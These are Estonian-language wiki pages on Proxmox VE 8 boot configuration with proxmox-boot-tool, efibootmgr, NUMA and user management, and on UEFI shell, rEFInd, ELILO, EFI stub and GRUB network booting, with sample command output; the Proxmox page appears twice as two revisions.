root@pve-svc-02:~# cat /etc/kernel/cmdline
root=ZFS=rpool/ROOT/pve-1 boot=zfs pcie_aspm=off pcie_port_pm=off nvme_core.default_ps_max_latency_us=0 nvme_core.apst=0

root@pve-svc-02:~# proxmox-boot-tool refresh
</pre>

===proxmox-boot-tool kasutamine - grub===

Vajadusel --force suvand

# proxmox-boot-tool format /dev/sda1 --force
# proxmox-boot-tool format /dev/sdb1 --force

grup tekitamine

# proxmox-boot-tool init /dev/sda1 grub
# proxmox-boot-tool init /dev/sdb1 grub

tulemuse kontrollimiseks

<pre>
# proxmox-boot-tool status
Re-executing '/usr/sbin/proxmox-boot-tool' in new private mount namespace..
System currently booted with uefi
0426-0BDE is configured with: grub (versions: 6.5.11-7-pve)
FB90-E8DA is configured with: grub (versions: 6.5.11-7-pve)
</pre>

ning

<pre>
# cat /etc/kernel/proxmox-boot-uuids
0426-0BDE
FB90-E8DA
</pre>

Selliselt käivitatud süsteemi edasiseks haldamiseks sobib öelda

<pre>
# proxmox-boot-tool status
# proxmox-boot-tool refresh
</pre>

Kusjuures nö klassikalise update-grub ütlemine kutsub välja sama 'proxmox-boot-tool refresh'

<pre>
# update-grub
Generating grub configuration file ...
W: This system is booted via proxmox-boot-tool:
W: Executing 'update-grub' directly does not update the correct configs!
W: Running: 'proxmox-boot-tool refresh'

No /etc/kernel/cmdline found - falling back to /proc/cmdline
Copying and configuring kernels on /dev/disk/by-uuid/17BA-8F03
Copying kernel 6.5.11-7-pve
Generating grub configuration file ...
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
Copying and configuring kernels on /dev/disk/by-uuid/EDA2-7AC7
Copying kernel 6.5.11-7-pve
Generating grub configuration file ...
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
</pre>

efibootmgr ja uuid osakond

<pre>
# efibootmgr -v
BootCurrent: 0006
Timeout: 10 seconds
BootOrder: 0006,0005,0000,0003,0004,0002
Boot0000 proxmox HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\PROXMOX\SHIMX64.EFI)
Boot0002* refind VenHw(99e275e7-75a0-4b37-a2e6-c5385e6c00cb)
Boot0003 debian HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\DEBIAN\SHIMX64.EFI)
Boot0004 debian HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\DEBIAN\GRUBX64.EFI)..BO
Boot0005* UEFI OS HD(1,GPT,d240f095-7252-4a51-8480-77d19650cb3f,0x800,0x1dc800)/File(\EFI\BOOT\BOOTX64.EFI)..BO
Boot0006* UEFI OS HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\BOOT\BOOTX64.EFI)..BO

# blkid /dev/sda1
/dev/sda1: UUID="17BA-8F03" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="7c575bd3-de2d-4d57-b344-be7529331560"

# blkid /dev/sdb1
/dev/sdb1: UUID="EDA2-7AC7" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="d240f095-7252-4a51-8480-77d19650cb3f"
</pre>

kus

* efibootmgr väljundis ei ole esitatud otseselt kõvakette number (mis väljendab nt sata ketta puhul millisesse sata porti on kaabel kinnitatud)
* HD(1,GPT) väljendab et tegu on mingi süsteemi kõvakette esimese partitsiooniga ning et kasutusel on gpt partitsioonitabel, vfat failisüsteemi uuid, ning milline efi rakendus käivitatakse sellelt vfat partitsioonilt
* kinnitatud portide kohta saab teada 'lsscsi -v' või 'lshw -c storage -c disk' väljundist

Secure Boot osakond

<pre>
# mokutil --sb-state
SecureBoot enabled

# efibootmgr -v
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0003,0002,0001,0000,0007,0004,0005,0006,0008
Boot0000* UiApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0001* UEFI QEMU HARDDISK QM00015 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0x7,0x0)/Sata(1,65535,0)N.....YM....R,Y.
Boot0002* UEFI QEMU HARDDISK QM00013 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0x7,0x0)/Sata(0,65535,0)N.....YM....R,Y.
...
</pre>

===proxmox-boot-tool kasutamine - bootctl -> grub===

Selleks, et süsteem lülitada käima grub asjakorraldusega, tuleb lihtsalt sooritada punktis 'proxmox-boot-tool kasutamine - grub' esitatud tegevused. Ning eemaldada uuid failist kaks esimest sissekannet, st et alles jääb

<pre>
root@pve-svc-02:~# cat /etc/kernel/proxmox-boot-uuids
F5E8-BD97
F649-D031

root@pve-svc-02:~# blkid /dev/sda2
/dev/sda2: UUID="F5E8-BD97" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="965e6433-d985-450c-8519-4124b9f2daa6"
root@pve-svc-02:~# blkid /dev/sdb2
/dev/sdb2: UUID="F649-D031" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="51a297f3-64bc-4ce7-8f01-6daf0b11b7f7"
</pre>

===Storage - host: nvme -> zfs ja guest: lvm -> ext4===

====host nvme -> zfs seadistus====

TODO

host juures sobib kasutada

TODO

====guest lvm -> ext4 seadistus====

Virtuaalse arvuti seadistustes sobib kasutada

* cache - none
* bus/device - SCSI VirtIO
* ssd emulation - jah
* io thread - eeldusel et on üks virtuaalne plokkseade pole vajadust

üldine soovitus

* bus/device - SCSI VirtIO single
* IO therad - jah

====Kasulikud lisamaterjalid====

* https://forum.proxmox.com/threads/pve-7-1-with-zfs-best-practices-for-windows-vm-hard-disk.106101/
* https://forum.proxmox.com/threads/questions-about-disk-config.137724/

===NUMA - non-uniform memory access===

Väited

* kasutamine praktiliselt eeldab, et PVE node on füüsiliselt enam kui ühe füüsilise cpu'ga arvuti, nt dual-socket
* NUMA lubaduseks on et virtuaalse arvuti protsessorid seostatakse sobivalt füüsiliste protsessoritega, ning vastava füüsilise mäluga

Kasutamiseks tuleb PVE webgui keskkonnas valida

* Hardware -> Processors -> Sockets - 2
* Hardware -> Processors -> Cores - 4
* Hardware -> Processors -> VCPUSs - 8 (kujuneb ise socket ja cores korrutiseks)
* Hardware -> Processors -> Enable NUMA - linnutada

Tulemusena on virtuaalses arvutis selline väljund

<pre>
root@pbs:~# lscpu | grep NUMA
NUMA node(s): 2
NUMA node0 CPU(s): 0,1
NUMA node1 CPU(s): 2,3
</pre>

ning

<pre>
root@pbs:~# numactl --hardware
available: 2 nodes (0-1)
node 0 cpus: 0 1
node 0 size: 1901 MB
node 0 free: 46 MB
node 1 cpus: 2 3
node 1 size: 2014 MB
node 1 free: 1014 MB
node distances:
node 0 1
0: 10 20
1: 20 10
</pre>

ning

<pre>
root@pbs:~# numastat
node0 node1
numa_hit 592792 2138996
numa_miss 0 462989
numa_foreign 462989 0
interleave_hit 586 597
local_node 591816 2137704
other_node 976 464281
</pre>

===Kasutajate haldamine===

====PVE osakond====

Väited

* paroolide hashid - /etc/pve/priv/shadow.cfg
* kasutajate nimed - /etc/pve/user.cfg

Kasutaja lisamine

pveum user add testuser@pve -comment "Just a test"

Kasuta parooli sättimine

pveum passwd testuser@pve

Kasutaja lisamine admin gruppi eesmärgiga, et kasutajal oleks nö enam privileege

pveum user modify testuser@pve -group admin

Kasutajate nimekirja küsimine

pveum user list

Gruppide nimekirja küsimine

pveum group list

===2-node klaster===

TODO

===Kasulikud lisamaterjalid===

* https://pve.proxmox.com/wiki/Host_Bootloader

Proxmox v. 8 kasutamine

2026-05-05T04:20:21Z

Imre: /* proxmox-boot-tool kasutamine - grub */

===Sissejuhatus===

TODO

===proxmox-boot-tool kasutamine - bootctl===

<pre>
root@pve-svc-02:~# cat /etc/kernel/cmdline
root=ZFS=rpool/ROOT/pve-1 boot=zfs pcie_aspm=off pcie_port_pm=off nvme_core.default_ps_max_latency_us=0 nvme_core.apst=0

root@pve-svc-02:~# proxmox-boot-tool refresh
</pre>

===proxmox-boot-tool kasutamine - grub===

Vajadusel --force suvand

# proxmox-boot-tool format /dev/sda1 --force
# proxmox-boot-tool format /dev/sdb1 --force

grup tekitamine

# proxmox-boot-tool init /dev/sda1 grub
# proxmox-boot-tool init /dev/sdb1 grub

tulemuse kontrollimiseks

<pre>
# proxmox-boot-tool status
Re-executing '/usr/sbin/proxmox-boot-tool' in new private mount namespace..
System currently booted with uefi
0426-0BDE is configured with: grub (versions: 6.5.11-7-pve)
FB90-E8DA is configured with: grub (versions: 6.5.11-7-pve)
</pre>

ning

<pre>
# cat /etc/kernel/proxmox-boot-uuids
0426-0BDE
FB90-E8DA
</pre>

Selliselt käivitatud süsteemi edasiseks haldamiseks sobib öelda

<pre>
# proxmox-boot-tool status
# proxmox-boot-tool refresh
</pre>

Kusjuures nö klassikalise update-grub ütlemine kutsub välja sama 'proxmox-boot-tool refresh'

<pre>
# update-grub
Generating grub configuration file ...
W: This system is booted via proxmox-boot-tool:
W: Executing 'update-grub' directly does not update the correct configs!
W: Running: 'proxmox-boot-tool refresh'

No /etc/kernel/cmdline found - falling back to /proc/cmdline
Copying and configuring kernels on /dev/disk/by-uuid/17BA-8F03
Copying kernel 6.5.11-7-pve
Generating grub configuration file ...
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
Copying and configuring kernels on /dev/disk/by-uuid/EDA2-7AC7
Copying kernel 6.5.11-7-pve
Generating grub configuration file ...
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
Found linux image: /boot/vmlinuz-6.5.11-7-pve
Found initrd image: /boot/initrd.img-6.5.11-7-pve
Adding boot menu entry for UEFI Firmware Settings ...
done
</pre>

efibootmgr ja uuid osakond

<pre>
# efibootmgr -v
BootCurrent: 0006
Timeout: 10 seconds
BootOrder: 0006,0005,0000,0003,0004,0002
Boot0000 proxmox HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\PROXMOX\SHIMX64.EFI)
Boot0002* refind VenHw(99e275e7-75a0-4b37-a2e6-c5385e6c00cb)
Boot0003 debian HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\DEBIAN\SHIMX64.EFI)
Boot0004 debian HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\DEBIAN\GRUBX64.EFI)..BO
Boot0005* UEFI OS HD(1,GPT,d240f095-7252-4a51-8480-77d19650cb3f,0x800,0x1dc800)/File(\EFI\BOOT\BOOTX64.EFI)..BO
Boot0006* UEFI OS HD(1,GPT,7c575bd3-de2d-4d57-b344-be7529331560,0x800,0x1dc800)/File(\EFI\BOOT\BOOTX64.EFI)..BO

# blkid /dev/sda1
/dev/sda1: UUID="17BA-8F03" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="7c575bd3-de2d-4d57-b344-be7529331560"

# blkid /dev/sdb1
/dev/sdb1: UUID="EDA2-7AC7" BLOCK_SIZE="512" TYPE="vfat" PARTUUID="d240f095-7252-4a51-8480-77d19650cb3f"
</pre>

kus

* efibootmgr väljundis ei ole esitatud otseselt kõvakette number (mis väljendab nt sata ketta puhul millisesse sata porti on kaabel kinnitatud)
* HD(1,GPT) väljendab et tegu on mingi süsteemi kõvakette esimese partitsiooniga ning et kasutusel on gpt partitsioonitabel, vfat failisüsteemi uuid, ning milline efi rakendus käivitatakse sellelt vfat partitsioonilt
* kinnitatud portide kohta saab teada 'lsscsi -v' või 'lshw -c storage -c disk' väljundist

Secure Boot osakond

<pre>
# mokutil --sb-state
SecureBoot enabled

# efibootmgr -v
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0003,0002,0001,0000,0007,0004,0005,0006,0008
Boot0000* UiApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0001* UEFI QEMU HARDDISK QM00015 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0x7,0x0)/Sata(1,65535,0)N.....YM....R,Y.
Boot0002* UEFI QEMU HARDDISK QM00013 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0x7,0x0)/Sata(0,65535,0)N.....YM....R,Y.
...
</pre>

===proxmox-boot-tool kasutamine - bootctl -> grub===

Selleks, et süsteem lülitada käima grub asjakorraldusega, tuleb lihtsalt sooritada punktis 'proxmox-boot-tool kasutamine - grub' esitatud tegevused.

===Storage - host: nvme -> zfs ja guest: lvm -> ext4===

====host nvme -> zfs seadistus====

TODO

host juures sobib kasutada

TODO

====guest lvm -> ext4 seadistus====

Virtuaalse arvuti seadistustes sobib kasutada

* cache - none
* bus/device - SCSI VirtIO
* ssd emulation - jah
* io thread - eeldusel et on üks virtuaalne plokkseade pole vajadust

üldine soovitus

* bus/device - SCSI VirtIO single
* IO therad - jah

====Kasulikud lisamaterjalid====

* https://forum.proxmox.com/threads/pve-7-1-with-zfs-best-practices-for-windows-vm-hard-disk.106101/
* https://forum.proxmox.com/threads/questions-about-disk-config.137724/

===NUMA - non-uniform memory access===

Väited

* kasutamine praktiliselt eeldab, et PVE node on füüsiliselt enam kui ühe füüsilise cpu'ga arvuti, nt dual-socket
* NUMA lubaduseks on et virtuaalse arvuti protsessorid seostatakse sobivalt füüsiliste protsessoritega, ning vastava füüsilise mäluga

Kasutamiseks tuleb PVE webgui keskkonnas valida

* Hardware -> Processors -> Sockets - 2
* Hardware -> Processors -> Cores - 4
* Hardware -> Processors -> VCPUSs - 8 (kujuneb ise socket ja cores korrutiseks)
* Hardware -> Processors -> Enable NUMA - linnutada

Tulemusena on virtuaalses arvutis selline väljund

<pre>
root@pbs:~# lscpu | grep NUMA
NUMA node(s): 2
NUMA node0 CPU(s): 0,1
NUMA node1 CPU(s): 2,3
</pre>

ning

<pre>
root@pbs:~# numactl --hardware
available: 2 nodes (0-1)
node 0 cpus: 0 1
node 0 size: 1901 MB
node 0 free: 46 MB
node 1 cpus: 2 3
node 1 size: 2014 MB
node 1 free: 1014 MB
node distances:
node 0 1
0: 10 20
1: 20 10
</pre>

ning

<pre>
root@pbs:~# numastat
node0 node1
numa_hit 592792 2138996
numa_miss 0 462989
numa_foreign 462989 0
interleave_hit 586 597
local_node 591816 2137704
other_node 976 464281
</pre>

===Kasutajate haldamine===

====PVE osakond====

Väited

* paroolide hashid - /etc/pve/priv/shadow.cfg
* kasutajate nimed - /etc/pve/user.cfg

Kasutaja lisamine

pveum user add testuser@pve -comment "Just a test"

Kasuta parooli sättimine

pveum passwd testuser@pve

Kasutaja lisamine admin gruppi eesmärgiga, et kasutajal oleks nö enam privileege

pveum user modify testuser@pve -group admin

Kasutajate nimekirja küsimine

pveum user list

Gruppide nimekirja küsimine

pveum group list

===2-node klaster===

TODO

===Kasulikud lisamaterjalid===

* https://pve.proxmox.com/wiki/Host_Bootloader

UEFI

2026-05-05T04:06:20Z

Imre: /* Kasulikud lisamaterjalid */

===Sissejuhatus===

TODO

===UEFI Shell kasutamine===

UEFI shell võib olla

* integreeritud arvuti riistvaras - sel juhul tavaliselt arvuti käivitumisel UEFI setup keskkonnas saab valida efi shelli minemise
* arvuti riistvara oskab käivitada uefi shelli kui talle vastav .efi ette näidata

Teine variant on nt kasutusel arvuti J3170M puhul, efi shell sobib kopeerida nt aadressilt https://sourceforge.net/p/tianocore/edk2/ci/master/tree/

EdkShellBinPkg -> Full Shell -> X64 -> Shell_Full.efi

ja paigutada nt arvutile külge ühendatatava USB pulge juur failisüsteemi või /boot/efi partitsioonile nimega shellx64.efi.

Kopeerimine

fs0:\EFI\debian> cp fs1:\vmlinuz-4.7.0-0.bpo.1-amd64 .

Boot valiku lisamiseks sobib öelda

TODO

===OS installeri ISO tõmmise käivitamine===

UEFI keskkonnasst OS installeri kasutamise eelduseks on, et see installer on nö EFI võimeline. Peale OS installeri ISO tõmmise arvutiga ühendamist (füüsiline CD seade, mingi remote virtual cd tõmmise ühendamine jms) tuleb öelda UEFI Shellis

Shell> map -r

mille väljundis peaks esinema uus plokkseade, nt fs1. Edasi tuleb käivitada boot*.efi nimeline fail (tab ei lõpeta sedasi kataloogi ja failinimesid ära)

Shell> fs1:\EFI\BOOT\BOOTX64.EFI

Tavaliselt seejärel käivitub GRUB2 bootloader, millest edasi saab jätkata tavalisel viisil. Lisaks on võimalik GRUB2'st väljuda, nt valides C ning seejärel exit

grub> exit

Tulemusena satutakse tagasi EFI shelli.

===Arvuti firmware uuendamine EFI shellist===

TODO

===Võrk EFI shellist===

TODO

===Arvuti dignostika EFI shellist===

Memtest86 http://www.memtest86.com/ kasutamisel paistab selline pilt

[[Fail:Uefi-10.gif]]

Kasulikud lisamaterjalid

* http://www.memtest86.com/download.htm

===efibootmgr===

EFI kasutamiseks on vajalikud sellised paketid + grub v. 2.02 vms

grub-efi-amd64-bin
efibootmgr

Olemasolevate EFI boot valikute esitamine

# efibootmgr
BootCurrent: 0008
Timeout: 0 seconds
BootOrder: 0002,0008,0003,0005,0000,0001,0006
Boot0000 EFI Network 3
Boot0001 EFI Network 4
Boot0002* proxmox
Boot0003 EFI Network 1
Boot0005 EFI Network 2
Boot0006* Windows Boot Manager
Boot0008* debian

kus

* BootCurrent - vaikimisi käivitatav valik
* Timeout - viivitus
* BootOrder - boot valikute läbiproovimise järjekord, esimene töötav käivitub
* Boot0xxx - boot valikud
* UEFI Boot menüü esitab ainult BootOrder nimekirjas olevaid valikuid oma sissekannetena

Kaheksanda boot valiku eemaldamiseks arvuti NVRAM seest

# efibootmgr -b 8 -B

Järgmise UEFI boot sissekande tekitamine, automaatselt pannakse see boot orderis esimesele kohale

# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=deb2 --recheck
Installing for x86_64-efi platform.
File descriptor 4 (/dev/sda1) leaked on vgs invocation. Parent PID 3056: grub-install
File descriptor 4 (/dev/sda1) leaked on vgs invocation. Parent PID 3056: grub-install
Installation finished. No error reported

Tulemusena tekib UEFI boot menüüsse juurde uus boot valik 'deb2' ning failisüsteemi genereeritaks efi grub rakendus

/boot/efi/EFI/deb2/grubx64.efi

Seejärel võiks uuesti genereerida ka grub.cfg faili

# update-grub

Sobiva uefi valikute järjestatud nimekirja saab tekitada nt selliselt (seejärel programmi väljundis näidatakse kehtestatud uut orderit)

# efibootmgr -o 2,8,3,5,0,1

EFS partitsiooni monteerimiseks sobib kasutada sellist rida

# cat /etc/fstab
...
/dev/sda1 /boot/efi vfat umask=0077 0 1

kusjuures EFI failisüsteemi sobib moodustada nt selliselt

# mkfs.vfat -F32 -n EFI /dev/sdb1
mkfs.fat 3.0.27 (2014-11-12)

Tundub, et UEFI arvuti grub promptis öeldes jõuab tulemusena arvuti Setup keskkonda

grub> fwsetup

===Trusted Boot ja SHIM===

TODO

===refind boot iso kasutamine===

Tundub, et rEFInd http://www.rodsbooks.com/refind/ sobib hästi erakorraliselt muidu UEFI installiga arvuti käivitamiseks.

* bootida .iso pealt üles
* valida meelepärane efi sissekanne vms (nt tuum, eelduseks on, et kuhugi efi failisüsteemis on sobiv tuuma ja initrd kopeeritud; või siis efi shellis olles kopeerida)
* pressid F2 ja näidata juur failisüsteem (tõnäeoliselt initrd on juba kirjas, st sisestada selle ette 'ro root=/dev/mapper/...')

ro root=/dev/mapper/pve-root initrd=...

===refind .zip arhiivi kasutamine===

====Paigaldamine====

Kopeerida ja pakkida lahti, nii et tulemuseks on /boot/efi failisüsteemis /boot/efi/EFI kataloogis bootvalikule 'refind' vastav kataloogi sisu sarnane (kopeerides .zip failist sellised kataloogid ja failid)

<pre>
/boot/efi/EFI/refind/drivers_x64
/boot/efi/EFI/refind/icons
/boot/efi/EFI/refind/refind_x64.efi
/boot/efi/EFI/refind/tools_x64
</pre>

Lisaks tuleb kopeerida efi failisüsteemi tuum ja initramfs, nt

# cp /boot/vmlinuz-4.4.0-87-generic /boot/initrd.img-4.4.0-87-generic /boot/efi/EFI/refind
# cd /boot/efi/EFI/refind

nimeteada tuuma failinimi ümber .efi lõpuga failiks (tundub, et see pole praktiliselt vajalik)

# mv vmlinuz-4.4.0-87-generic vmlinuz-4.4.0-87-generic.efi

====Seadistamine====

Seejärel sobib kasutada nt sellist seadistusfaili sisu

<pre>
# cat /boot/efi/EFI/refind/refind.conf
timeout 20
menuentry refind {
icon /EFI/refind/icons/os_linux.png
loader /EFI/refind/vmlinuz-4.4.0-87-generic
initrd /EFI/refind/initrd.img-4.4.0-87-generic
options "ro root=/dev/mapper/system-root"
}
</pre>

kus

* TODO

Veenduda, milline on muudatuste eelne boot järjekord

# efibootmgr -v

ning lisada efi boot valik, nb! lisatud valik muutub vaikevalikuks

# efibootmgr -c -L "refind" -l 'EFI\refind\refind_x64.efi'

ja kohendada muudatuste järgne boot järjekord, et senine default oleks edasi default

# efibootmgr -o 0,1,2

====Kasutamine====

Peale refind boot loaderi paigaldamist paitab uefi boot valikute nimekiri nimekiri nt selline, refind on aktiivne ja all on efi file path

[[Fail:Uefi-12.gif]]

Valides refind paistab selline pilt

[[Fail:Uefi-13.gif]]

ja liikudes refind edit režiimi selline pilt (valides Tab klahvi)

[[Fail:Uefi-14.gif]]

ning Tab abil editor sisse liikudes, siin saab muuta kerneli parameetreid

[[Fail:Uefi-15.gif]]

===ELILO===

Märkus: 2017 aasta alguses tundub, et see on iganenud tarkvara.

ELILO EFI rakendus abil saab arvuti käivitada EFI kaudu. Selleks tuleb kuhugi paigaldada elilo pakett

<pre>
| It is necessary to run /usr/sbin/elilo to install the new elilo binary into the EFI partition. │
│ │
│ WARNING: This procedure will write data into the debian directory of the EFI disk partition, possibly │
│ overwriting files installed there by hand. │
│ │
│ Not installing the new elilo binary on the EFI disk partition may leave the system in an unbootable │
│ state. Alternatives to automatic updating of the partition include running /usr/sbin/elilo by hand, │
│ or installing the new /usr/lib/elilo/elilo.efi executable into the EFI disk partition manually. │
│ │
│ Automatically run elilo?

</pre>

ning kopeerida bootitava arvuti ESP failisüsteemi sellised failid

# find /boot/efi/EFI/ELILO/ -ls
120 4 drwx------ 2 root root 4096 May 1 01:05 /boot/efi/EFI/ELILO/
126 236 -rwx------ 1 root root 239976 May 1 01:02 /boot/efi/EFI/ELILO/elilo.efi
127 4 -rwx------ 1 root root 463 May 1 01:14 /boot/efi/EFI/ELILO/elilo.conf
128 4236 -rwx------ 1 root root 4336880 May 1 01:05 /boot/efi/EFI/ELILO/vmlinuz-2.6.32-37-pve
129 1908 -rwx------ 1 root root 20382462 May 1 01:05 /boot/efi/EFI/ELILO/initrd.img-2.6.32-37-pve

kus

* elilo.efi - rakendus
* elilo.conf - seadistusfail

kus nt

# cat /boot/efi/EFI/ELILO/elilo.conf

delay=20
default=pve

image=vmlinuz-2.6.32-37-pve
label=pve
initrd=initrd.img-2.6.32-37-pve
description="Boot Debian Linux"
read-only
root=/dev/mapper/pve-root
append="console=ttyS0,9600

* booditava operatsioonisüsteemi tuum ja initramfs

Käivitamiseks sobib uefi shellist öelda

Shell> fs0:\efi\elilo\elilo.efi
ELILO v3.14 for EFI/x86_64n internal or external command, operable program, or batch fileram, or batch file
..
Loading kernel vmlinuz-2.6.32-37-pve... done
Loading file initrd.img-2.6.32-37-pve...done
...

===EFI Stub===

EFI Stub tähistab võimalust kasutada Linux tuuma nagu efi rakendust ning otse sellega süsteem alglaadida. Käsitsi uefi shellist toimub see selliselt

fs0:\> cp vmlinuz-3.2.0-4-amd64 vmlinuz-3.2.0-4-amd64.efi
fs0:\> vmlinuz-3.2.0-4-amd64.efi initrd=initrd.img-3.16.0-4-amd64 ro root=/dev/mapper/pve-root_deb8 console=ttyS0,9600

EFI boot sissekannete nimekirja lisamiseks sobib öelda

# efibootmgr -c -g -L "Debian (EFI stub)" -l '\EFI\BOOT\vmlinuz-3.2.0-4-amd64.efi' -u 'root=/dev/mapper/pve-root
ro rootfstype=ext3 add_efi_memmap initrd=\\EFI\\BOOT\\initrd.img-3.2.0-4-amd64 console=ttyS0,9600'

Kasulikud lisamaterjalid

* https://wiki.debian.org/EFIStub
* http://www.rodsbooks.com/efi-bootloaders/efistub.html

===syslinux-efi===

Tarkvara paigaldamiseks sobib öelda

# apt-get install syslinux-efi

EFI rakendused on

# find /usr/lib/SYSLINUX.EFI -type f
/usr/lib/SYSLINUX.EFI/efi64/syslinux.efi
/usr/lib/SYSLINUX.EFI/efi32/syslinux.efi

Seadisusfailina kasutatakse

/boot/efi/EFI/syslinux/syslinux.cfg

Getting cached packet
My IP is 10.0.0.18
Loading vmlinuz-2.6.32-37-pve... okoking vmlinuz-2.6.32-37-pve...
Loading initrd.img-2.6.32-37-pve...okoking initrd.img-2.6.32-37-pve...

===GRUB===

Kui arvutil on boot valikud on nt sellised

[[Pilt:Uefi-11.gif]]

kus

* UEFI: * - arvuti käivitatakse kui UEFI riistvara
* mitmed muud valikud käivitavad arvuti kui BIOS riistvara

Selleks, et käivitatud arvutit saaks seadistatada UEFI'i arvutina (nt kaustada efibootmgr programmi) tuleb ta käivitada UEFI režiimis.

'UEFI: Network Card' kaardilt käivitamiseks on muus osas nagu tavalne DHCP + TFTP käivitamine, kuid seejuures peab TFTP serveril asuma spetsiifiline GRUB EFI rakendus, mis muu hulgas sisaldab kõiki kataloogis /usr/lib/grub/x86_64-efi olevaid grub mooduleid. Sellise rakenduse tekitamiseks sobib öelda (millegipärast grub.cfg'd ei kasutata ...)

# grub2-mkstandalone -d /usr/lib/grub2/x86_64-efi -O x86_64-efi --fonts="unicode" -o bootx64.efi boot/grub/grub.cfg

Peale seda kui UEFI network boot on kopeerinud rakendust ning selle käivitamise tulemusel on ees grub> prompt tuleb laadida mõned olulised moodulid, nt

grub> insmod part_gpt
grub> insmod efi_gop
grub> insmod efi_uga
grub> insmod mdraid1x
grub> insmod lvm

ja seejärel tuum, initrd ning arvuti bootida

grub> linux (lvm/pve-root)/boot/vmlinuz-2.6.32-37-pve ro root=/dev/mapper/pve-root console=ttyS0,9600
grub> initrd (lvm/pve-root)/boot/initrd.img-2.6.32-37-pve
grub> boot

Tulemusena peaks arvuti töötama.

===Märkused===

UEFI kasutamiseks tuleb arvuti käivitada UEFI režiimis. Võib-olla on arvuteid, mida ei saagi muul viisil käivitada, aga tundub, et 2015 aasta kevadel on nö kahe-režiimsed arvutid üsna levinud

TODO

Kui selline arvuti on käivitatud nt SystemRescueCd plaadilt BIOS alla, siis paistab efibootmgr väljund sedasi

Fatal: Couldn't open either sysfs or procfs directories for accessing EFI variables

* Kui ühte ja sama arvutit käivitada nö UEFI ja mitte-UEFI režiimis (nt laadides sama tuumaga tftp serverilt), siis paistavad dmesg peal sarnased erinevused

# diff /var/tmp/uefita.log /var/tmp/uefiga.log
..
< Command line: initrd=initrd.img-2.6.32-37-pve root=/dev/mapper/pve-root ro console=ttyS0,9600 BOOT_IMAGE=vmlinuz-2.6.32-37-pve
---
> Command line: BOOT_IMAGE=(lvm/pve-root)/boot/vmlinuz-2.6.32-37-pve ro root=/dev/mapper/pve-root console=ttyS0,9600
10,12c10,11
< BIOS-e820: 0000000000000000 - 000000000009bc00 (usable)
< BIOS-e820: 000000000009bc00 - 00000000000a0000 (reserved)
< BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
---
> BIOS-e820: 0000000000000000 - 00000000000a0000 (usable)
> BIOS-e820: 00000000000a0000 - 00000000000c0000 (reserved)
..
31a32,118
> EFI v2.31 by American Megatrends
> BIOS ID: S1200RP.86B.01.03.0004.201308211450
> ACPI 2.0=0xbefeff98 SMBIOS=0xf0440
> EFI: mem00: type=3, attr=0xf, range=[0x0000000000000000-0x0000000000008000) (0MB)
> EFI: mem01: type=7, attr=0xf, range=[0x0000000000008000-0x000000000003f000) (0MB)
> EFI: mem02: type=4, attr=0xf, range=[0x000000000003f000-0x0000000000040000) (0MB)
> EFI: mem03: type=3, attr=0xf, range=[0x0000000000040000-0x00000000000a0000) (0MB)
> EFI: mem04: type=2, attr=0xf, range=[0x0000000000100000-0x0000000001566000) (20MB)
...
> efifb: probing for efifb
> efifb: framebuffer at 0xc2000000, mapped to 0xffffc90009e00000, using 1920k, total 1920k
> efifb: mode is 800x600x32, linelength=3200, pages=1
> efifb: scrolling: redraw
> efifb: Truecolor: size=8:8:8:8, shift=24:16:8:0
> Refined TSC clocksource calibration: 3292.375 MHz.
> Console: switching to colour frame buffer device 100x37
> Switching to clocksource tsc
> fb0: EFI VGA frame buffer device
....

efivar programmiga saab uurida EFI muutujaid

# apt-get install efivar

mis paistab sedasi

# efivar -l
8be4df61-93ca-11d2-aa0d-00e098032b8c-BootCurrent
8be4df61-93ca-11d2-aa0d-00e098032b8c-QuickLookBoot
8be4df61-93ca-11d2-aa0d-00e098032b8c-ErrOutDev
8be4df61-93ca-11d2-aa0d-00e098032b8c-ConOut
8be4df61-93ca-11d2-aa0d-00e098032b8c-ConOutDev
8be4df61-93ca-11d2-aa0d-00e098032b8c-ConInDev
8be4df61-93ca-11d2-aa0d-00e098032b8c-ConIn
...

